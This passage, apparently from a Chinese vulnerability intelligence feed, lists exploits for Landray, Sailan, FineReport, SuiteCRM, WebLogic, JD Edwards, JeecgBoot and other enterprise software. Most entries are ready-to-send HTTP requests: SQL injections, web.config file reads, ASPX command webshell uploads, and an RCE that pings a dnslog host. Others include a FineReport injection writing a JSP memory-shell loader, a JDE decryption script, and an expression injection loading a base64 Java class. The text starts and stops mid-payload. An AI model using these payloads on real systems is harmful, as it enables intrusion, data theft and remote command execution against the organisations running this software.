0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelName=test
蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/third/DingTalk/Demo/ShowUserInfo.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+
HTTP/1.1
蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/frm/frm_form_list_main.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+ HTTP/1.1
蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/flow/fl_define_flow_chart_show.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+ HTTP/1.1
蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/third/DingTalk/Pages/UniformEntry.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+
HTTP/1.1
蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/dossier/doc_fileedit_word.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/frm/frm_button_func.aspx |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTTP/1.1
蓝凌 EKP 曝远程代码执行0day漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/ekp/data/sys-common/dataxml.tmpl |
WAF封禁路路径,等待发布补丁 |
802 |
0day |
漏洞详情
POST /ekp/data/sys-common/dataxml.tmpl HTTP/1.1
s_bean=ruleFormulaValidate&script=try {
String cmd = "ping 123456.wgzrdb.dnslog.cn";
Process child = Runtime.getRuntime().exec(cmd);
} catch (IOException e) {
System.err.println(e);
}
赛蓝
赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/BaseModule/SysLog/ReadTxtLog?FileName=../web.config |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1
赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/Utility/GetJSFile?filePath=../web.config |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
赛蓝企业管理系统DownloadBuilder任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/BaseModule/ReportManage/DownloadBuilder |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
赛蓝企业管理系统 GetCssFile存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/Utility/GetCssFile |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1
赛蓝企业管理系统-SubmitUploadify-任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/EHRModule/EHR_Holidays/SubmitUploadify |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /EHRModule/EHR_Holidays/SubmitUploadify?FolderId=1&UserId=1 HTTP/1.1
------WebKitFormBoundaryD5Mawpg068t7pbxZ
<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
------WebKitFormBoundaryD5Mawpg068t7pbxZ--
赛蓝企业管理系统SubmitUploadify存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/EHRModule/EHR_Holidays/SubmitUploadify |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /EHRModule/EHR_Holidays/SubmitUploadify?FolderId=1&UserId=1 HTTP/1.1
-----------------------------142851345723692939351758052805
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------142851345723692939351758052805--
赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/BaseModule/ExcelImport/GetImportDetailJson |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
漏洞详情
GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&IsShow=1 HTTP/1.1
数字通
指尖云平台-智慧政务payslip SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/payslip/search/index/userid/time/time?PayslipUser[user_id]= |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
数字通指尖云平台-智慧政务payslip SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/payslip/search/index/userid/time/time |
使用WAF进行拦截 |
724 |
nday |
漏洞详情
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
SuiteCRM
SuiteCRM responseEntryPoint存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/index.php?entryPoint=responseEntryPoint&event=1&delegate= |
使用WAF进行拦截 |
723 |
nday |
漏洞详情
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
云课
云课网校系统uploadImage存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件上传 |
未知 |
/api/uploader/uploadImaged |
使用WAF进行拦截 |
723 |
nday |
漏洞详情
POST /api/uploader/uploadImage HTTP/1.1
------WebKitFormBoundaryLZbmKeasWgo2gPtU
<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
帆软
帆软FineReport全版本被曝viewReportSever?0day注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
全版本 |
/webroot/decision/view/ReportSever?test=&n= |
等着 |
723 |
1day |
漏洞详情
GET /webroot/decision/view/ReportServer?test=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1
帆软报表 channel 远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
<10.0.19.42 & <11.0.28 |
/webroot/decision/remote/design/channel |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /webroot/decision/remote/design/channel HTTP/1.1
{{gzip(file(fine10.bin))}}
Oracle
WebLogic远程代码执行漏洞(CVE-2024-21006)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
12.2.1.4.0 和 14.1.1.0.0 |
github自己搜 |
升级系统版本 |
723 |
nday |
漏洞详情
github自己搜
WebLogic Server 远程代码执行漏洞(XVE-2024-4789)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
未知 |
禁用 T3 协议和 IIOP 协议 |
726 |
0day |
漏洞详情
未知
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/manage/fileDownloader?sec=1 |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
import base64
import argparse
import subprocess
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def main():
parser = argparse.ArgumentParser(description='Decrypt a given string.')
parser.add_argument('--string', help='The string to be decrypted')
parser.add_argument('--target', help='The target URL to fetch the string from')
args = parser.parse_args()
if args.target:
response = fetch_target_string_with_curl(args.target)
if response:
input_str = response
print(f"Fetched string from target: {input_str}")
else:
print("No valid string found in the response.")
return
elif args.string:
input_str = args.string
else:
print("You must provide either --string or --target.")
return
array_of_bytes = jde_decipher(input_str.encode("UTF-8"))
print("Decrypted string:", array_of_bytes.decode("UTF-8"))
def fetch_target_string_with_curl(target_url):
try:
result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True)
if result.returncode == 0:
response_text = result.stdout.strip()
print("Response received:")
print(response_text)
return response_text
else:
print(f"curl failed with return code {result.returncode}")
return None
except Exception as e:
print(f"Failed to fetch from target using curl: {e}")
return None
def jde_decipher(param_array_of_bytes):
array_of_bytes_1 = show_buffer(param_array_of_bytes)
array_of_bytes_2 = base64.b64decode(array_of_bytes_1)
return array_of_bytes_2
def show_buffer(param_array_of_bytes):
array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2)
for j in range(len(array_of_bytes_1)):
i = 2 * j
array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65)
if array_of_bytes_1[0] != 2:
raise Exception("Invalid version for net showBuffer")
array_of_bytes_2 = bytearray(16)
array_of_bytes_3 = bytearray(16)
gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3])
cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3)
array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size)
return array_of_bytes_4
def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte):
array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46])
array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54])
array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56])
j = param_byte >> 4
k = param_byte & 0xF
m = array_of_bytes_3[j]
for i in range(16):
param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m
m = array_of_bytes_3[k]
for i in range(16):
param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m
if __name__ == "__main__":
main()
积木
JeecgBoot SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/jeecg-boot/contractor/contractor/list |
使用WAF进行拦截 |
723 |
未知 |
漏洞详情
未知
JeecgBoot反射型XSS漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| XSS |
未知 |
/userController.do |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
积木报表JeecgBoot被爆存在.net反序列化RCE 0day漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI= |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
/jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=
积木报表JeecgBoot存在SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/jeecg-boot/jmreport/queryFieldBySql |
WAF封禁路路径,等待发布补丁 |
801 |
nday |
漏洞详情
POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
{"sql":"select '1' "}
JeecgBoot系统AviatorScript表达式注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 |
WAF封禁路路径,等待发布补丁 |
812 |
nday |
漏洞详情
POST /jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123 HTTP/1.1
{
"loopBlockList": [],
"area": false,
"printElWidth": 718,
"excel_config_id": "980882669965455363",
"printElHeight": 1047,
"rows": {
"4": {
"cells": {
"4": {
"text": "=(use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('test', Base64Utils.decodeFromString('yv66vgAAADQANgoACQAlCgAmACcIACgKACYAKQcAKgcAKwoABgAsBwAtBwAuAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMdGVzdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKgEAClNvdXJjZUZpbGUBAAl0ZXN0LmphdmEMAAoACwcAMAwAMQAyAQAEY2FsYwwAMwA0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDAAKADUBAAR0ZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABgoTGphdmEvbGFuZy9UaHJvd2FibGU7KVYAIQAIAAkAAAAAAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAJAA4AAAAMAAEAAAAFAA8AEAAAAAEAEQASAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAAWAA4AAAAgAAMAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAFQAWAAIAFwAAAAQAAQAYAAEAEQAZAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAAbAA4AAAAqAAQAAAABAA8AEAAAAAAAAQATABQAAQAAAAEAGgAbAAIAAAABABwAHQADABcAAAAEAAEAGAAIAB4ACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAADQAJABAADAAOAA0ADwAWABEADgAAAAwAAQANAAkAHwAgAAAAIQAAAAcAAkwHACIJAAEAIwAAAAIAJA=='), ClassLoader.getSystemClassLoader());)",
"style": 0
}
},
"height": 25
},
"len": 96,
"-1": {
"cells": {
"-1": {
